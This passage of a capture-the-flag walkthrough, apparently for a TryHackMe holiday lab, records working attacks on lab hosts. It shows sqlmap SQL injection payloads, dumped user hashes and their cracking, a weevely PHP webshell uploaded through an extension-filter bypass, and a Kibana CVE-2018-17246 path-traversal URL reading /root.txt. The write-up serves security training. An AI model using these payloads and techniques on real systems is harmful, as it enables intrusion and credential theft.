[19:18:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:18:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:18:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:18:42] [INFO] POST parameter 'log_email' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[19:18:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:18:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to 'http://10.10.95.214:80/index.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] n
[19:19:19] [INFO] target URL appears to be UNION injectable with 12 columns
[19:19:19] [INFO] POST parameter 'log_email' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'log_email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 77 HTTP(s) requests:
---
Parameter: log_email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: log_email=noraj@toto.fr' AND (SELECT 4787 FROM (SELECT(SLEEP(5)))zyYD) AND 'PUeG'='PUeG&log_password=noraj&login_button=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: log_email=noraj@toto.fr' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b7a7171,0x554a754769714965464f564d7468734276675a767a6d525253716663534e744c417472564a594948,0x71786a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&log_password=noraj&login_button=Login
---
[19:19:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[19:19:25] [INFO] fetched data logged to text files under '/home/noraj/.local/share/sqlmap/output/10.10.95.214'

[*] ending @ 19:19:25 /2020-11-29/
```

> What is Santa Claus' email address?

Answer: {% spoiler `bigman@shefesh.com` %}

```
$ sqlmap --method POST -u http://10.10.95.214/register.php --data 'log_email=noraj@toto.fr&log_password=noraj&login_button=Login' --dbs
...
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] social
[*] sys

$ sqlmap --method POST -u http://10.10.95.214/register.php --data 'log_email=noraj@toto.fr&log_password=noraj&login_button=Login' -D social --tables
...
Database: social
[8 tables]
+-----------------+
| comments        |
| friend_requests |
| likes           |
| messages        |
| notifications   |
| posts           |
| trends          |
| users           |
+-----------------+

$ sqlmap --method POST -u http://10.10.95.214/register.php --data 'log_email=noraj@toto.fr&log_password=noraj&login_button=Login' -D social -T users --columns
...
Database: social
Table: users
[12 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| email        | varchar(100) |
| first_name   | varchar(25)  |
| friend_array | text         |
| id           | int(11)      |
| last_name    | varchar(25)  |
| num_likes    | int(11)      |
| num_posts    | int(11)      |
| password     | varchar(255) |
| profile_pic  | varchar(255) |
| signup_date  | date         |
| user_closed  | varchar(3)   |
| username     | varchar(100) |
+--------------+--------------+

$ sqlmap --method POST -u http://10.10.95.214/register.php --data 'log_email=noraj@toto.fr&log_password=noraj&login_button=Login' -D social -T users -C username,password,email --dump
...
Database: social
Table: users
[9 entries]
+-----------------------+----------------------------------+------------------------+
| username              | password                         | email                  |
+-----------------------+----------------------------------+------------------------+
| santa_claus           | f1267830a78c0b59acc06b05694b2e28 | bigman@shefesh.com     |
| mommy_mistletoe       | 402223cb4df4c5050a38043d38b1372b | mmtoe@shefesh.com      |
| arnold_schwarzenegger | 78a6d0e6c73a29ef6d07d56f32f67b30 | terminator@shefesh.com |
| johnfortnite_kennedy  | bc808149a93bc7050c3c6c4b7a5a0c97 | jayfkay@shefesh.com    |
| john_richardson       | aa4e356d1509f1c1f53e0191601cde72 | john@keepingit.online  |
| naughty_elf           | 6aff5ae0718de8945a3f71ba4d1ca76f | notty@shefesh.com      |
| felix_navidad         | 57e9eb182943223b0b4e7f17c5e4cb6e | felixnav@shefesh.com   |
| jessica_claus         | 15bc4f3ba871b2fa651363dcddfb27d9 | mrsclaus@shefesh.com   |
| myron_larabee         | a60c0662c54bde0301d9aa2ad86203df | mailman@shefesh.com    |
+-----------------------+----------------------------------+------------------------+
```

> What is Santa Claus' plaintext password?

Answer: {% spoiler `saltnpepper` %}

```
$ john /tmp/sqlmap56o5f2b6144029/sqlmaphashes-x2usmm49.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=raw-md5
Using default input encoding: UTF-8
Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
saltnpepper      (santa_claus)
1g 0:00:00:01 DONE (2020-11-29 19:39) 0.5181g/s 7431Kp/s 7431Kc/s 59535KC/s  filimani..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
```

> Santa has a secret! Which station is he meeting Mrs Mistletoe in?

Answer: {% spoiler `Waterloo` %}

http://10.10.95.214/messages.php?u=mommy_mistletoe

> Once you're logged in to LapLANd, there's a way you can gain a shell on the machine! Find a way to do so and read the file in /home/user/

Answer: {% spoiler `THM{SHELLS_IN_MY_EGGNOG}` %}

Webshell generation:

```
$ weevely generate noraj agent.php
Generated 'agent.php' with password 'noraj' of 774 byte size.
```

Upload a file on post, extension blacklist bypass.

https://book.hacktricks.xyz/pentesting-web/file-upload

Access the webshell from the CLI:

```
$ weevely http://10.10.95.214/assets/images/posts/5fc3ee910fd35agent.phtml noraj
weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@server:/var/www/html/assets/images/posts $ cd /home
www-data@server:/home $ ls
user
www-data@server:/home $ cd user
www-data@server:/home/user $ ls
flag.txt
www-data@server:/home/user $ cat flag.txt
```

## [Day 24] Elf Stalk

> Find the password in the database

Answer: {% spoiler `9Qs58Ol3AXkMWLxiEyUyyf` %}

Service scan:

```
$ sudo nmap -sSVC -p- 10.10.75.227 -v
...
PORT     STATE SERVICE   VERSION
111/tcp  open  rpcbind   2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
5601/tcp open  esmagent?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|     HTTP/1.1 400 Bad Request
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     kbn-name: kibana
|     kbn-xpack-sig: 5a29ca259924bec4872ad69d3677ec71
|     content-type: application/json; charset=utf-8
|     cache-control: no-cache
|     content-length: 60
|     Date: Sun, 29 Nov 2020 19:01:47 GMT
|     Connection: close
|     {"statusCode":404,"error":"Not Found","message":"Not Found"}
|   GetRequest:
|     HTTP/1.1 200 OK
|     kbn-name: kibana
|     kbn-xpack-sig: 5a29ca259924bec4872ad69d3677ec71
|     cache-control: no-cache
|     content-type: text/html; charset=utf-8
|     content-length: 217
|     accept-ranges: bytes
|     Date: Sun, 29 Nov 2020 19:01:46 GMT
|     Connection: close
|     <script>var hashRoute = '/app/kibana';
|     defaultRoute = '/app/kibana';
|     hash = window.location.hash;
|     (hash.length) {
|     window.location = hashRoute + hash;
|     else {
|     window.location = defaultRoute;
|     }</script>
|   HTTPOptions:
|     HTTP/1.1 404 Not Found
|     kbn-name: kibana
|     kbn-xpack-sig: 5a29ca259924bec4872ad69d3677ec71
|     content-type: application/json; charset=utf-8
|     cache-control: no-cache
|     content-length: 38
|     Date: Sun, 29 Nov 2020 19:01:46 GMT
|     Connection: close
|_    {"statusCode":404,"error":"Not Found"}
8000/tcp open  http      SimpleHTTPServer 0.6 (Python 3.7.4)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/3.7.4
|_http-title: Directory listing for /
9200/tcp open  http      Elasticsearch REST API 6.4.2 (name: sn6hfBl; cluster: elasticsearch; Lucene 7.4.0)
|_http-favicon: Unknown favicon MD5: 6177BFB75B498E0BB356223ED76FFE43
| http-methods:
|   Supported Methods: DELETE HEAD GET OPTIONS
|_  Potentially risky methods: DELETE
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
9300/tcp open  vrace?
| fingerprint-strings:
|   FourOhFourRequest, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|_    This is not an HTTP port
```

- 5601 Kibana
- 8000 Logstack
- 9200 Elastic Search

Elastic query for the password:

```
$ curl 'http://10.10.75.227:9200/_search?q=password' -s | jq
{
  "took": 123,
  "timed_out": false,
  "_shards": {
    "total": 6,
    "successful": 6,
    "skipped": 0,
    "failed": 0
  },
  "hits": {
    "total": 1,
    "max_score": 2.0136302,
    "hits": [
      {
        "_index": "messages",
        "_type": "_doc",
        "_id": "73",
        "_score": 2.0136302,
        "_source": {
          "sender": "mary",
          "receiver": "wendy",
          "message": "hey, can you access my dev account for me. My username is l33tperson and my password is 9Qs58Ol3AXkMWLxiEyUyyf"
        }
      }
    ]
  }
}
```

> Read the contents of the /root.txt file

Answer: {% spoiler `someELKfun` %}

From nmap:

- Elasticsearch REST API 6.4.2
- Lucene 7.4.0

From http://10.10.75.227:8000/kibana-log.txt

- kibana@6.4.2
- c@6.4.2
- xpack_main@6.4.2
- searchprofiler@6.4.2
- etc.

Search for Kibana exploit:

```
$ searchsploit Kibana
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Kibana 6.6.1 - CSV Injection                                                        | windows/webapps/47971.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
```

> search kibana 6.4.2 exploit

https://github.com/mpgn/CVE-2018-17246

> CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

Exploit the LFI:

```
http://10.10.75.227:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt
```

The querry hangs because of the error generated so we go see logs at http://10.10.75.227:8000/kibana-log.txt and see:

```
{"type":"error","@timestamp":"2020-11-29T19:27:45Z","tags":["warning","process"],"pid":2710,"level":"error","error":{"message":"Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 3)","name":"UnhandledPromiseRejectionWarning","stack":"ReferenceError: someELKfun is not defined\n    at Object.<anonymous> (/root.txt:1:6)\n    at Module._compile (module.js:652:30)\n    at loader (/usr/share/kibana/node_modules/babel-register/lib/node.js:144:5)\n    at Object.require.extensions.(anonymous function) [as .js] (/usr/share/kibana/node_modules/babel-register/lib/node.js:154:7)\n    at Module.load (module.js:565:32)\n    at tryModuleLoad (module.js:505:12)\n    at Function.Module._load (module.js:497:3)\n    at Module.require (module.js:596:17)\n    at require (internal/module.js:11:18)\n    at /usr/share/kibana/src/core_plugins/console/api_server/server.js:19:19\n    at arrayEach (/usr/share/kibana/node_modules/lodash/index.js:1289:13)\n    at Function.<anonymous> (/usr/share/kibana/node_modules/lodash/index.js:3345:13)\n    at resolveApi (/usr/share/kibana/src/core_plugins/console/api_server/server.js:16:20)\n    at handler (/usr/share/kibana/src/core_plugins/console/index.js:115:41)\n    at Object.internals.handler (/usr/share/kibana/node_modules/hapi/lib/handler.js:96:36)\n    at request._protect.run (/usr/share/kibana/node_modules/hapi/lib/handler.js:30:23)\n    at module.exports.internals.Protect.internals.Protect.run (/usr/share/kibana/node_modules/hapi/lib/protect.js:64:5)\n    at exports.execute (/usr/share/kibana/node_modules/hapi/lib/handler.js:24:22)\n    at each (/usr/share/kibana/node_modules/hapi/lib/request.js:384:16)\n    at iterate (/usr/share/kibana/node_modules/items/lib/index.js:36:13)\n    at done (/usr/share/kibana/node_modules/items/lib/index.js:28:25)\n    at Hoek.once (/usr/share/kibana/node_modules/hapi/lib/protect.js:52:16)\n    at wrapped (/usr/share/kibana/node_modules/hoek/lib/index.js:879:20)\n    at done (/usr/share/kibana/node_modules/items/lib/index.js:31:25)\n    at Function.wrapped [as _next] (/usr/share/kibana/node_modules/hoek/lib/index.js:879:20)\n    at Function.internals.continue (/usr/share/kibana/node_modules/hapi/lib/reply.js:108:10)\n    at method (/usr/share/kibana/node_modules/x-pack/plugins/dashboard_mode/server/dashboard_mode_request_interceptor.js:44:7)\n    at Items.serial (/usr/share/kibana/node_modules/hapi/lib/request.js:403:22)"},"message":"Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 3)"}
```

